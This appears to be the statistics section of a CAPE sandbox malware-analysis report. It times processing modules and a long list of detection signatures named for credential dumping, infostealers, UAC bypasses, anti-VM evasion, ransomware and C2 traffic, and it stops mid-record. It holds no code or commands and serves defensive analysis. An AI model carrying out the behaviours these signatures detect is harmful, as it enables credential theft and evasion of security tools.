{ "statistics": { "processing": [ { "name": "CAPE", "time": 2.92 }, { "name": "AnalysisInfo", "time": 0.045 }, { "name": "BehaviorAnalysis", "time": 0.285 }, { "name": "Debug", "time": 0.002 }, { "name": "NetworkAnalysis", "time": 0.314 }, { "name": "UrlAnalysis", "time": 0.0 }, { "name": "script_log_processing", "time": 0.0 }, { "name": "ProcessMemory", "time": 0.0 } ], "signatures": [ { "name": "packer_themida", "time": 0.0 }, { "name": "stealth_network", "time": 0.0 }, { "name": "disable_driver_via_blocklist", "time": 0.0 }, { "name": "disable_driver_via_hvcidisallowedimages", "time": 0.0 }, { "name": "disable_hypervisor_protected_code_integrity", "time": 0.0 }, { "name": "pendingfilerenameoperations_Operations", "time": 0.0 }, { "name": "anomalous_deletefile", "time": 0.0 }, { "name": "antiav_360_libs", "time": 0.0 }, { "name": "antiav_ahnlab_libs", "time": 0.0 }, { "name": "antiav_avast_libs", "time": 0.0 }, { "name": "antiav_bitdefender_libs", "time": 0.0 }, { "name": "antiav_bullguard_libs", "time": 0.0 }, { "name": "antiav_emsisoft_libs", "time": 0.0 }, { "name": "antiav_qurb_libs", "time": 0.0 }, { "name": "antiav_servicestop", "time": 0.0 }, { "name": "antiav_apioverride_libs", "time": 0.0 }, { "name": "antidebug_guardpages", "time": 0.0 }, { "name": "antidebug_ntcreatethreadex", "time": 0.0 }, { "name": "antiav_nthookengine_libs", "time": 0.0 }, { "name": "antidebug_outputdebugstring", "time": 0.0 }, { "name": "antidebug_setunhandledexceptionfilter", "time": 0.0 }, { "name": "antidebug_windows", "time": 0.0 }, { "name": "antiemu_wine_func", "time": 0.0 }, { "name": "antisandbox_cuckoocrash", "time": 0.0 }, { "name": "antisandbox_foregroundwindows", "time": 0.0 }, { "name": "antisandbox_mouse_hook", "time": 0.0 }, { "name": "mouse_movement_detect", "time": 0.0 }, { "name": "antisandbox_sboxie_libs", "time": 0.0 }, { "name": "antisandbox_sboxie_objects", "time": 0.0 }, { "name": "antisandbox_script_timer", "time": 0.0 }, { "name": "antisandbox_sleep", "time": 0.0 }, { "name": "antisandbox_sunbelt_libs", "time": 0.0 }, { "name": "antisandbox_unhook", "time": 0.0 }, { "name": "antivm_directory_objects", "time": 0.0 }, { "name": "antivm_generic_disk", "time": 0.0 }, { "name": "antivm_generic_scsi", "time": 0.0 }, { "name": "antivm_generic_services", "time": 0.0 }, { "name": "antivm_generic_system", "time": 0.0 }, { "name": "antivm_checks_available_memory", "time": 0.0 }, { "name": "detect_virtualization_via_recent_files", "time": 0.0 }, { "name": "antivm_vbox_libs", "time": 0.0 }, { "name": "antivm_vbox_window", "time": 0.0 }, { "name": "antivm_vmware_events", "time": 0.0 }, { "name": "antivm_vmware_libs", "time": 0.0 }, { "name": "api_spamming", "time": 0.0 }, { "name": "api_uuidfromstringa", "time": 0.0 }, { "name": "bcdedit_command", "time": 0.0 }, { "name": "bootkit", "time": 0.0 }, { "name": "potential_overwrite_mbr", "time": 0.0 }, { "name": "suspicious_ioctl_scsipassthough", "time": 0.0 }, { "name": "suspicious_iocontrol_codes", "time": 0.0 }, { "name": "browser_needed", "time": 0.0 }, { "name": "regsvr32_squiblydoo_dll_load", "time": 0.0 }, { "name": "uac_bypass_cmstp", "time": 0.0 }, { "name": "uac_bypass_eventvwr", "time": 0.0 }, { "name": "uac_bypass_windows_Backup", "time": 0.0 }, { "name": "dotnet_code_compile", "time": 0.0 }, { "name": "queries_computer_name", "time": 0.0 }, { "name": "queries_user_name", "time": 0.0 }, { "name": "creates_largekey", "time": 0.0 }, { "name": "creates_nullvalue", "time": 0.0 }, { "name": "access_windows_passwords_vault", "time": 0.0 }, { "name": "dump_lsa_via_windows_error_reporting", "time": 0.0 }, { "name": "lsass_credential_dumping", "time": 0.0 }, { "name": "critical_process", "time": 0.0 }, { "name": "cryptopool_domains", "time": 0.0 }, { "name": "dead_connect", "time": 0.0 }, { "name": "dead_link", "time": 0.0 }, { "name": "debugs_self", "time": 0.0 }, { "name": "decoy_document", "time": 0.0 }, { "name": "decoy_image", "time": 0.0 }, { "name": "deletes_consolehost_history", "time": 0.0 }, { "name": "deletes_shadow_copies", "time": 0.0 }, { "name": "deletes_system_state_backup", "time": 0.0 }, { "name": "dep_bypass", "time": 0.0 }, { "name": "dep_disable", "time": 0.0 }, { "name": "disables_mappeddrives_autodisconnect", "time": 0.0 }, { "name": "disables_wfp", "time": 0.0 }, { "name": "add_windows_defender_exclusions", "time": 0.0 }, { "name": "dll_load_uncommon_file_types", "time": 0.0 }, { "name": "document_script_exe_drop", "time": 0.0 }, { "name": "guloader_apis", "time": 0.0 }, { "name": "driver_load", "time": 0.0 }, { "name": "dynamic_function_loading", "time": 0.0 }, { "name": "encrypted_ioc", "time": 0.0 }, { "name": "exec_crash", "time": 0.0 }, { "name": "process_creation_suspicious_location", "time": 0.0 }, { "name": "exploit_getbasekerneladdress", "time": 0.0 }, { "name": "exploit_gethaldispatchtable", "time": 0.0 }, { "name": "exploit_heapspray", "time": 0.0 }, { "name": "koadic_apis", "time": 0.0 }, { "name": "koadic_network_activity", "time": 0.0 }, { "name": "downloads_from_filehosting", "time": 0.0 }, { "name": "generic_phish", "time": 0.0 }, { "name": "http_request", "time": 0.0 }, { "name": "infostealer_browser", "time": 0.0 }, { "name": "infostealer_browser_password", "time": 0.0 }, { "name": "infostealer_cookies", "time": 0.0 }, { "name": "cryptbot_network", "time": 0.0 }, { "name": "infostealer_keylog", "time": 0.0 }, { "name": "masslogger_artifacts", "time": 0.0 }, { "name": "purplewave_network_activity", "time": 0.0 }, { "name": "quilclipper_behavior", "time": 0.0 }, { "name": "raccoon_behavior", "time": 0.0 }, { "name": "captures_screenshot", "time": 0.0 }, { "name": "vidar_behavior", "time": 0.0 }, { "name": "injection_createremotethread", "time": 0.0 }, { "name": "creates_suspended_process", "time": 0.0 }, { "name": "injection_explorer", "time": 0.0 }, { "name": "injection_needextension", "time": 0.0 }, { "name": "injection_network_traffic", "time": 0.0 }, { "name": "injection_runpe", "time": 0.0 }, { "name": "injection_rwx", "time": 0.0 }, { "name": "injection_themeinitapihook", "time": 0.0 }, { "name": "resumethread_remote_process", "time": 0.0 }, { "name": "injection_write_exe_process", "time": 0.0 }, { "name": "injection_write_process", "time": 0.0 }, { "name": "internet_dropper", "time": 0.0 }, { "name": "escalate_privilege_via_named_pipe", "time": 0.0 }, { "name": "ipc_namedpipe", "time": 0.0 }, { "name": "js_phish", "time": 0.0 }, { "name": "js_suspicious_redirect", "time": 0.0 }, { "name": "loader_alien", "time": 0.0 }, { "name": "execute_binary_via_internet_explorer_exporter", "time": 0.0 }, { "name": "execute_binary_via_run_exe_helper_utility", "time": 0.0 }, { "name": "execute_ps_via_syncappvpublishingserver", "time": 0.0 }, { "name": "malicious_dynamic_function_loading", "time": 0.0 }, { "name": "encrypt_pcinfo", "time": 0.0 }, { "name": "encrypt_data_agenttesla_http", "time": 0.0 }, { "name": "encrypt_data_agentteslat2_http", "time": 0.0 }, { "name": "encrypt_data_nanocore", "time": 0.0 }, { "name": "reads_memory_remote_process", "time": 0.0 }, { "name": "mimics_filetime", "time": 0.0 }, { "name": "amsi_bypass_via_com_registry", "time": 0.0 }, { "name": "access_auto_logons_via_registry", "time": 0.0 }, { "name": "access_boot_key_via_registry", "time": 0.0 }, { "name": "create_suspicious_lnk_files", "time": 0.0 }, { "name": "credential_access_via_windows_credential_history", "time": 0.0 }, { "name": "dll_hijacking_via_microsoft_exchange", "time": 0.0 }, { "name": "dll_hijacking_via_waas_medic_svc_com_typelib", "time": 0.0 }, { "name": "execute_file_downloaded_via_openssh", "time": 0.0 }, { "name": "execute_safe_mode_from_suspicious_process", "time": 0.0 }, { "name": "execute_scripts_via_microsoft_management_console", "time": 0.0 }, { "name": "execute_suspicious_processes_via_windows_mssql_service", "time": 0.0 }, { "name": "execution_from_self_extracting_archive", "time": 0.0 }, { "name": "ip_address_discovery_via_trusted_program", "time": 0.0 }, { "name": "load_dll_via_control_panel", "time": 0.0 }, { "name": "network_connection_via_suspicious_process", "time": 0.0 }, { "name": "potential_location_discovery_via_unusual_process", "time": 0.0 }, { "name": "store_executable_registry", "time": 0.0 }, { "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", "time": 0.0 }, { "name": "suspicious_java_execution_via_win_scripts", "time": 0.0 }, { "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", "time": 0.0 }, { "name": "uses_restart_manager_for_suspicious_activities", "time": 0.0 }, { "name": "modify_desktop_wallpaper", "time": 0.0 }, { "name": "modify_zoneid_ads", "time": 0.0 }, { "name": "move_file_on_reboot", "time": 0.0 }, { "name": "multiple_useragents", "time": 0.0 }, { "name": "network_anomaly", "time": 0.0 }, { "name": "network_bind", "time": 0.0 }, { "name": "network_cnc_https_archive", "time": 0.0 }, { "name": "network_cnc_https_free_webshoting", "time": 0.0 }, { "name": "network_cnc_https_generic", "time": 0.0 }, { "name": "network_cnc_https_temp_urldns", "time": 0.0 }, { "name": "network_cnc_https_opensource", "time": 0.0 }, { "name": "network_cnc_https_pastesite", "time": 0.0 }, { "name": "network_cnc_https_payload", "time": 0.0 }, { "name": "network_cnc_https_serviceinterface", "time": 0.0 }, { "name": "network_cnc_https_socialmedia", "time": 0.0 }, { "name": "network_cnc_https_telegram", "time": 0.0 }, { "name": "network_cnc_https_tempstorage", "time": 0.0 }, { "name": "network_cnc_https_urlshortener", "time": 0.0 }, { "name": "network_cnc_https_useragent", "time": 0.0 }, { "name": "network_cnc_smtps_exfil", "time": 0.0 }, { "name": "network_cnc_smtps_generic", "time": 0.0 }, { "name": "network_dns_idn", "time": 0.0 }, { "name": "network_dns_suspicious_querytype", "time": 0.0 }, { "name": "network_dns_tunneling_request", "time": 0.0 }, { "name": "network_document_http", "time": 0.0 }, { "name": "explorer_http", "time": 0.0 }, { "name": "network_fake_useragent", "time": 0.0 }, { "name": "legitimate_domain_abuse", "time": 0.0 }, { "name": "suspicious_communication_trusted_site", "time": 0.0 }, { "name": "network_document_file", "time": 0.0 }, { "name": "network_tor", "time": 0.0 }, { "name": "office_com_load", "time": 0.0 }, { "name": "office_dotnet_load", "time": 0.0 }, { "name": "office_mshtml_load", "time": 0.0 }, { "name": "office_vb_load", "time": 0.0 }, { "name": "office_wmi_load", "time": 0.0 }, { "name": "office_cve2017_11882", "time": 0.0 }, { "name": "office_cve2017_11882_network", "time": 0.0 }, { "name": "office_cve_2021_40444", "time": 0.0 }, { "name": "office_cve_2021_40444_m2", "time": 0.0 }, { "name": "office_flash_load", "time": 0.0 }, { "name": "office_postscript", "time": 0.0 }, { "name": "office_suspicious_processes", "time": 0.0 }, { "name": "office_write_exe", "time": 0.0 }, { "name": "persistence_via_autodial_dll_registry", "time": 0.0 }, { "name": "persistence_autorun", "time": 0.0 }, { "name": "persistence_autorun_tasks", "time": 0.0 }, { "name": "persistence_bootexecute", "time": 0.0 }, { "name": "persistence_registry_script", "time": 0.0 }, { "name": "powershell_network_connection", "time": 0.0 }, { "name": "powershell_download", "time": 0.0 }, { "name": "powershell_request", "time": 0.0 }, { "name": "createtoolhelp32snapshot_module_enumeration", "time": 0.0 }, { "name": "enumerates_running_processes", "time": 0.0 }, { "name": "process_interest", "time": 0.0 }, { "name": "process_needed", "time": 0.0 }, { "name": "mass_data_encryption", "time": 0.0 }, { "name": "ransomware_file_modifications", "time": 0.0 }, { "name": "nemty_network_activity", "time": 0.0 }, { "name": "nemty_note", "time": 0.0 }, { "name": "sodinokibi_behavior", "time": 0.0 }, { "name": "stop_ransomware_registry", "time": 0.0 }, { "name": "blackrat_apis", "time": 0.0 }, { "name": "blackrat_network_activity", "time": 0.0 }, { "name": "blackrat_registry_keys", "time": 0.0 }, { "name": "dcrat_behavior", "time": 0.0 }, { "name": "karagany_system_event_objects", "time": 0.0 }, { "name": "rat_luminosity", "time": 0.0 }, { "name": "rat_nanocore", "time": 0.0 }, { "name": "netwire_behavior", "time": 0.0 }, { "name": "obliquerat_network_activity", "time": 0.0 }, { "name": "orcusrat_behavior", "time": 0.0 }, { "name": "trochilusrat_apis", "time": 0.0 }, { "name": "reads_self", "time": 0.0 }, { "name": "recon_beacon", "time": 0.0 }, { "name": "recon_programs", "time": 0.0 }, { "name": "recon_systeminfo", "time": 0.0 }, { "name": "accesses_recyclebin", "time": 0.0 }, { "name": "remcos_shell_code_dynamic_wrapper_x", "time": 0.0 }, { "name": "script_created_process", "time": 0.0 }, { "name": "script_network_activity", "time": 0.0 }, { "name": "suspicious_js_script", "time": 0.0 }, { "name": "javascript_timer", "time": 0.0 }, { "name": "secure_login_phishing", "time": 0.0 }, { "name": "securityxploded_modules", "time": 0.0 }, { "name": "get_clipboard_data", "time": 0.0 }, { "name": "sets_autoconfig_url", "time": 0.0 }, { "name": "spoofs_procname", "time": 0.0 }, { "name": "stack_pivot", "time": 0.0 }, { "name": "stack_pivot_file_created", "time": 0.0 }, { "name": "stack_pivot_process_create", "time": 0.0 }, { "name": "set_clipboard_data", "time": 0.0 }, { "name": "stealth_childproc", "time": 0.0 }, { "name": "stealth_file", "time": 0.0 }, { "name": "stealth_system_procname", "time": 0.0 }, { "name": "stealth_timeout", "time": 0.0 }, { "name": "stealth_window", "time": 0.0 }, { "name": "queries_keyboard_layout", "time": 0.0 }, { "name": "queries_locale_api", "time": 0.0 }, { "name": "terminates_remote_process", "time": 0.0 }, { "name": "uiautomationcore_load", "time": 0.0 }, { "name": "user_enum", "time": 0.0 }, { "name": "virus", "time": 0.0 }, { "name": "neshta_files", "time": 0.0 }, { "name": "neshta_regkeys", "time": 0.0 }, { "name": "webmail_phish", "time": 0.0 }, { "name": "persists_dev_util", "time": 0.0 }, { "name": "spawns_dev_util", "time": 0.0 }, { "name": "alters_windows_utility", "time": 0.0 }, { "name": "overwrites_accessibility_utility", "time": 0.0 }, { "name": "Potential_Lateral_Movement_Via_SMBEXEC", "time": 0.0 }, { "name": "potential_WebShell_Via_ScreenConnectServer", "time": 0.0 }, { "name": "uses_Microsoft_HTML_Help_Executable", "time": 0.0 }, { "name": "wiper_zeroedbytes", "time": 0.0 }, { "name": "wmi_create_process", "time": 0.0 }, { "name": "wmi_script_process", "time": 0.0 }, { "name": "antianalysis_tls_section", "time": 0.0 }, { "name": "antivirus_clamav", "time": 0.0 }, { "name": "antivirus_virustotal", "time": 0.0 }, { "name": "bad_certs", "time": 0.0 }, { "name": "bad_ssl_certs", "time": 0.0 }, { "name": "banker_zeus_p2p", "time": 0.0 }, { "name": "banker_zeus_url", "time": 0.0 }, { "name": "binary_yara", "time": 0.0 }, { "name": "bot_athenahttp", "time": 0.0 }, { "name": "bot_dirtjumper", "time": 0.0 }, { "name": "bot_drive", "time": 0.0 }, { "name": "bot_drive2", "time": 0.0 }, { "name": "bot_madness", "time": 0.0 }, { "name": "phishing_kit_detected", "time": 0.0 }, { "name": "family_proxyback", "time": 0.0 }, { "name": "flare_capa_antianalysis", "time": 0.0 }, { "name": "flare_capa_collection", "time": 0.0 }, { "name": "flare_capa_communication", "time": 0.0 }, { "name": "flare_capa_compiler", "time": 0.0 }, { "name": "flare_capa_datamanipulation", "time": 0.0 }, { "name": "flare_capa_executable", "time": 0.0 }, { "name": "flare_capa_hostinteraction", "time": 0.0 }, { "name": "flare_capa_impact", "time": 0.0 }, { "name": "flare_capa_lib", "time": 0.0 }, { "name": "flare_capa_linking", "time": 0.0 }, { "name": "flare_capa_loadcode", "time": 0.0 }, { "name": "flare_capa_malwarefamily", "time": 0.0 }, { "name": "flare_capa_nursery", "time": 0.0 }, { "name": "flare_capa_persistence", "time": 0.0 }, { "name": "flare_capa_runtime", "time": 0.0 }, { "name": "flare_capa_targeting", "time": 0.0 }, { "name": "threatfox", "time": 0.0 }, { "name": "log4shell", "time": 0.0 }, { "name": "mimics_extension", "time": 0.0 }, { "name": "network_country_distribution", "time": 0.0 }, { "name": "network_cnc_http", "time": 0.0 }, { "name": "network_ip_exe", "time": 0.0 }, { "name": "network_dga", "time": 0.0 }, { "name": "network_dga_fraunhofer", "time": 0.0 }, { "name": "network_dyndns", "time": 0.004 }, { "name": "network_excessive_udp", "time": 0.0 }, { "name": "network_http", "time": 0.0 }, { "name": "network_icmp", "time": 0.0 }, { "name": "network_irc", "time": 0.0 }, { "name": "network_open_proxy", "time": 0.0 }, { "name": "network_questionable_http_path", "time": 0.0 }, { "name": "network_questionable_https_path", "time": 0.0 }, { "name": "network_smtp", "time": 0.0 }, { "name": "network_torgateway", "time": 0.001 }, { "name": "origin_langid", "time": 0.0 }, { "name": "origin_resource_langid", "time": 0.0 }, { "name": "overlay", "time": 0.0 }, { "name": "packer_unknown_pe_section_name", "time": 0.0 }, { "name": "packer_aspack", "time": 0.0 }, { "name": "packer_aspirecrypt", "time": 0.0 }, { "name": "packer_bedsprotector", "time": 0.0 }, { "name": "packer_confuser", "time": 0.0 }, { "name": "packer_enigma", "time": 0.0 }, { "name": "packer_entropy", "time": 0.0 }, { "name": "packer_mpress", "time": 0.0 }, { "name": "packer_nate", "time": 0.0 }, { "name": "packer_nspack", "time": 0.0 }, { "name": "packer_smartassembly", "time": 0.0 }, { "name": "packer_spices", "time": 0.0 }, { "name": "packer_themida", "time": 0.0 }, { "name": "packer_titan", "time": 0.0 }, { "name": "packer_upx", "time": 0.0 }, { "name": "packer_vmprotect", "time": 0.0 }, { "name": "packer_yoda", "time": 0.0 }, { "name": "pdf_annot_urls_checker", "time": 0.0 }, { "name": "polymorphic", "time": 0.0 }, { "name": "punch_plus_plus_pcres", "time": 0.0 }, { "name": "procmem_yara", "time": 0.0 }, { "name": "recon_checkip", "time": 0.0 }, { "name": "static_authenticode", "time": 0.0 }, { "name": "invalid_authenticode_signature", "time": 0.0 }, { "name": "static_dotnet_anomaly", "time": 0.0 }, { "name": "static_java", "time": 0.0 }, { "name": "static_pdf", "time": 0.0 }, { "name": "contains_pe_overlay", "time": 0.0 }, { "name": "static_pe_anomaly", "time": 0.0 }, { "name": "pe_compile_timestomping", "time": 0.0 }, { "name": "static_pe_pdbpath", "time": 0.0 }, { "name": "static_rat_config", "time": 0.0 }, { "name": "static_versioninfo_anomaly", "time": 0.0 }, { "name": "suricata_alert", "time": 0.0 }, { "name": "suspicious_html_body", "time": 0.0 }, { "name": "suspicious_html_name", "time": 0.0 }, { "name": "suspicious_html_title", "time": 0.0 }, { "name": "volatility_devicetree_1", "time": 0.0 }, { "name": "volatility_handles_1", "time": 0.0 }, { "name": "volatility_ldrmodules_1", "time": 0.0 }, { "name": "volatility_ldrmodules_2", "time": 0.0 }, { "name": "volatility_malfind_1", "time": 0.0 }, { "name": "volatility_malfind_2", "time": 0.0 }, { "name": "volatility_modscan_1", "time": 0.0 }, { "name": "volatility_svcscan_1", "time": 0.0 }, { "name": "volatility_svcscan_2", "time": 0.0 }, { "name": "volatility_svcscan_3", "time": 0.0 }, { "name": "whois_create", "time": 0.0 }, { "name": "accesses_mailslot", "time": 0.0 }, { "name": "accesses_netlogon_regkey", "time": 0.001 }, { "name": "accesses_public_folder", "time": 0.0 }, { "name": "accesses_sysvol", "time": 0.0 }, { "name": "writes_sysvol", "time": 0.0 }, { "name": "adds_admin_user", "time": 0.0 }, { "name": "adds_user", "time": 0.0 }, { "name": "overwrites_admin_password", "time": 0.0 }, { "name": "antianalysis_detectfile", "time": 0.004 }, { "name": "antianalysis_detectreg", "time": 0.036 }, { "name": "modify_attachment_manager", "time": 0.0 }, { "name": "antiav_detectfile", "time": 0.007 }, { "name": "antiav_detectreg", "time": 0.18 }, { "name": "antiav_srp", "time": 0.0 }, { "name": "antiav_whitespace", "time": 0.0 }, { "name": "antidebug_devices", "time": 0.001 }, { "name": "antiemu_windefend", "time": 0.0 }, { "name": "antiemu_wine_reg", "time": 0.0 }, { "name": "antisandbox_cuckoo_files", "time": 0.0 }, { "name": "antisandbox_fortinet_files", "time": 0.0 }, { "name": "antisandbox_joe_anubis_files", "time": 0.0 }, { "name": "antisandbox_sboxie_mutex", "time": 0.0 }, { "name": "antisandbox_sunbelt_files", "time": 0.0 }, { "name": "antisandbox_threattrack_files", "time": 0.0 }, { "name": "antivm_bochs_keys", "time": 0.003 }, { "name": "antivm_generic_bios", "time": 0.003 }, { "name": "antivm_generic_diskreg", "time": 0.007 }, { "name": "antivm_hyperv_keys", "time": 0.003 }, { "name": "antivm_parallels_keys", "time": 0.01 }, { "name": "antivm_recentdocs", "time": 0.0 }, { "name": "antivm_vbox_devices", "time": 0.001 }, { "name": "antivm_vbox_files", "time": 0.003 }, { "name": "antivm_vbox_keys", "time": 0.023 }, { "name": "antivm_vmware_devices", "time": 0.0 }, { "name": "antivm_vmware_files", "time": 0.001 }, { "name": "antivm_vmware_keys", "time": 0.012 }, { "name": "antivm_vmware_mutexes", "time": 0.0 }, { "name": "antivm_vpc_files", "time": 0.0 }, { "name": "antivm_vpc_keys", "time": 0.01 }, { "name": "antivm_vpc_mutex", "time": 0.0 }, { "name": "antivm_xen_keys", "time": 0.01 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "gulpix_behavior", "time": 0.0 }, { "name": "ketrican_regkeys", "time": 0.002 }, { "name": "okrum_mutexes", "time": 0.0 }, { "name": "banker_cridex", "time": 0.0 }, { "name": "geodo_banking_trojan", "time": 0.005 }, { "name": "banker_spyeye_mutexes", "time": 0.0 }, { "name": "banker_zeus_mutex", "time": 0.0 }, { "name": "bitcoin_opencl", "time": 0.0 }, { "name": "accesses_primary_patition", "time": 0.0 }, { "name": "direct_hdd_access", "time": 0.0 }, { "name": "enumerates_physical_drives", "time": 0.0 }, { "name": "physical_drive_access", "time": 0.0 }, { "name": "bot_russkill", "time": 0.0 }, { "name": "browser_addon", "time": 0.0 }, { "name": "chromium_browser_extension_directory", "time": 0.0 }, { "name": "browser_helper_object", "time": 0.0 }, { "name": "browser_security", "time": 0.001 }, { "name": "browser_startpage", "time": 0.0 }, { "name": "ie_disables_process_tab", "time": 0.0 }, { "name": "odbcconf_bypass", "time": 0.0 }, { "name": "squiblydoo_bypass", "time": 0.0 }, { "name": "squiblytwo_bypass", "time": 0.0 }, { "name": "bypass_chromium_protection", "time": 0.0 }, { "name": "bypass_firewall", "time": 0.003 }, { "name": "checks_uac_status", "time": 0.001 }, { "name": "uac_bypass_cmstpcom", "time": 0.0 }, { "name": "uac_bypass_delegateexecute_sdclt", "time": 0.0 }, { "name": "uac_bypass_fodhelper", "time": 0.0 }, { "name": "cape_extracted_content", "time": 0.0 }, { "name": "carberp_mutex", "time": 0.0 }, { "name": "clears_logs", "time": 0.0 }, { "name": "cmdline_obfuscation", "time": 0.0 }, { "name": "cmdline_switches", "time": 0.0 }, { "name": "cmdline_terminate", "time": 0.0 }, { "name": "cmdline_forfiles_wildcard", "time": 0.0 }, { "name": "cmdline_http_link", "time": 0.0 }, { "name": "cmdline_long_string", "time": 0.0 }, { "name": "cmdline_reversed_http_link", "time": 0.0 }, { "name": "long_commandline", "time": 0.0 }, { "name": "powershell_renamed_commandline", "time": 0.0 }, { "name": "copies_self", "time": 0.0 }, { "name": "credwiz_credentialaccess", "time": 0.0 }, { "name": "enables_wdigest", "time": 0.0 }, { "name": "vaultcmd_credentialaccess", "time": 0.0 }, { "name": "file_credential_store_access", "time": 0.001 }, { "name": "file_credential_store_write", "time": 0.0 }, { "name": "kerberos_credential_access_via_rubeus", "time": 0.0 }, { "name": "registry_credential_dumping", "time": 0.0 }, { "name": "registry_credential_store_access", "time": 0.001 }, { "name": "registry_lsa_secrets_access", "time": 0.0 }, { "name": "comsvcs_credentialdump", "time": 0.0 }, { "name": "cryptomining_stratum_command", "time": 0.0 }, { "name": "cypherit_mutexes", "time": 0.0 }, { "name": "darkcomet_regkeys", "time": 0.002 }, { "name": "datop_loader", "time": 0.0 }, { "name": "deepfreeze_mutex", "time": 0.0 }, { "name": "deletes_executed_files", "time": 0.0 }, { "name": "disables_app_launch", "time": 0.0 }, { "name": "disables_auto_app_termination", "time": 0.0 }, { "name": "disables_appv_virtualization", "time": 0.0 }, { "name": "disables_backups", "time": 0.001 }, { "name": "disables_browser_warn", "time": 0.001 }, { "name": "disables_context_menus", "time": 0.0 }, { "name": "disables_cpl_disable", "time": 0.0 }, { "name": "disables_crashdumps", "time": 0.0 }, { "name": "disables_event_logging", "time": 0.0 }, { "name": "disables_folder_options", "time": 0.0 }, { "name": "disables_notificationcenter", "time": 0.0 }, { "name": "disables_power_options", "time": 0.001 }, { "name": "disables_restore_default_state", "time": 0.0 }, { "name": "disables_run_command", "time": 0.0 }, { "name": "disables_smartscreen", "time": 0.0 }, { "name": "disables_startmenu_search", "time": 0.0 }, { "name": "disables_system_restore", "time": 0.0 }, { "name": "disables_uac", "time": 0.0 }, { "name": "disables_wer", "time": 0.0 }, { "name": "disables_windows_defender", "time": 0.0 }, { "name": "disables_windows_defender_logging", "time": 0.0 }, { "name": "removes_windows_defender_contextmenu", "time": 0.0 }, { "name": "removes_windows_defender_updates", "time": 0.0 }, { "name": "windows_defender_powershell", "time": 0.0 }, { "name": "disables_windows_file_protection", "time": 0.0 }, { "name": "disables_windowsupdate", "time": 0.0 }, { "name": "disables_winfirewall", "time": 0.0 }, { "name": "adfind_domain_enumeration", "time": 0.0 }, { "name": "domain_enumeration_commands", "time": 0.0 }, { "name": "andromut_mutexes", "time": 0.0 }, { "name": "downloader_cabby", "time": 0.0 }, { "name": "phorpiex_mutexes", "time": 0.0 }, { "name": "protonbot_mutexes", "time": 0.0 }, { "name": "driver_filtermanager", "time": 0.0 }, { "name": "dropper", "time": 0.0 }, { "name": "dll_archive_execution", "time": 0.0 }, { "name": "lnk_archive_execution", "time": 0.0 }, { "name": "script_archive_execution", "time": 0.0 }, { "name": "excel4_macro_urls", "time": 0.0 }, { "name": "escalate_privilege_via_ntlm_relay", "time": 0.0 }, { "name": "spooler_access", "time": 0.0 }, { "name": "spooler_svc_start", "time": 0.0 }, { "name": "mapped_drives_uac", "time": 0.0 }, { "name": "hides_recycle_bin_icon", "time": 0.0 }, { "name": "apocalypse_stealer_file_behavior", "time": 0.0 }, { "name": "arkei_files", "time": 0.0 }, { "name": "azorult_mutexes", "time": 0.001 }, { "name": "infostealer_bitcoin", "time": 0.004 }, { "name": "cryptbot_files", "time": 0.0 }, { "name": "echelon_files", "time": 0.001 }, { "name": "infostealer_ftp", "time": 0.063 }, { "name": "infostealer_im", "time": 0.035 }, { "name": "infostealer_mail", "time": 0.011 }, { "name": "masslogger_files", "time": 0.0 }, { "name": "poullight_files", "time": 0.003 }, { "name": "purplewave_mutexes", "time": 0.0 }, { "name": "quilclipper_mutexes", "time": 0.0 }, { "name": "qulab_files", "time": 0.002 }, { "name": "qulab_mutexes", "time": 0.0 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "Evade_Execution_Via_ASPNet_Compiler", "time": 0.0 }, { "name": "Evade_Execute_Via_DeviceCredentialDeployment", "time": 0.0 }, { "name": "Evade_Execution_Via_Filter_Manager_Control", "time": 0.0 }, { "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", "time": 0.0 }, { "name": "execute_binary_via_appvlp", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_OpenSSH", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_PesterPSModule", "time": 0.0 }, { "name": "Execute_Binary_Via_ScriptRunner", "time": 0.0 }, { "name": "execute_binary_via_ttdinject", "time": 0.0 }, { "name": "Execute_Binary_Via_VisualStudioLiveShare", "time": 0.0 }, { "name": "Execute_Msiexec_Via_Explorer", "time": 0.0 }, { "name": "execute_remote_msi", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_runscripthelper", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_sqlps", "time": 0.0 }, { "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", "time": 0.0 }, { "name": "Perform_Malicious_Activities_Via_Headless_Browser", "time": 0.0 }, { "name": "Register_DLL_Via_CertOC", "time": 0.0 }, { "name": "Register_DLL_Via_MSIEXEC", "time": 0.0 }, { "name": "Register_DLL_Via_Odbcconf", "time": 0.0 }, { "name": "Scriptlet_Proxy_Execution_Via_Pubprn", "time": 0.0 }, { "name": "ie_martian_children", "time": 0.0 }, { "name": "office_martian_children", "time": 0.0 }, { "name": "mimics_icon", "time": 0.0 }, { "name": "masquerade_process_name", "time": 0.005 }, { "name": "mimikatz_modules", "time": 0.0 }, { "name": "ms_office_cmd_rce", "time": 0.0 }, { "name": "mount_copy_to_webdav_share", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_legit_utilities", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_qemu", "time": 0.0 }, { "name": "suspicious_execution_via_dotnet_remoting", "time": 0.0 }, { "name": "modify_certs", "time": 0.0 }, { "name": "dotnet_clr_usagelog_regkeys", "time": 0.0 }, { "name": "modify_hostfile", "time": 0.0 }, { "name": "modify_oem_information", "time": 0.0 }, { "name": "modify_security_center_warnings", "time": 0.0 }, { "name": "modify_uac_prompt", "time": 0.0 }, { "name": "network_dns_blockchain", "time": 0.0 }, { "name": "network_dns_opennic", "time": 0.001 }, { "name": "network_dns_paste_site", "time": 0.0 }, { "name": "network_dns_reverse_proxy", "time": 0.0 }, { "name": "network_dns_temp_file_storage", "time": 0.001 }, { "name": "network_dns_temp_urldns", "time": 0.0 }, { "name": "network_dns_url_shortener", "time": 0.001 }, { "name": "network_dns_doh_tls", "time": 0.0 }, { "name": "suspicious_tld", "time": 0.006 }, { "name": "network_tor_service", "time": 0.0 }, { "name": "office_code_page", "time": 0.0 }, { "name": "office_addinloading", "time": 0.0 }, { "name": "office_perfkey", "time": 0.0 }, { "name": 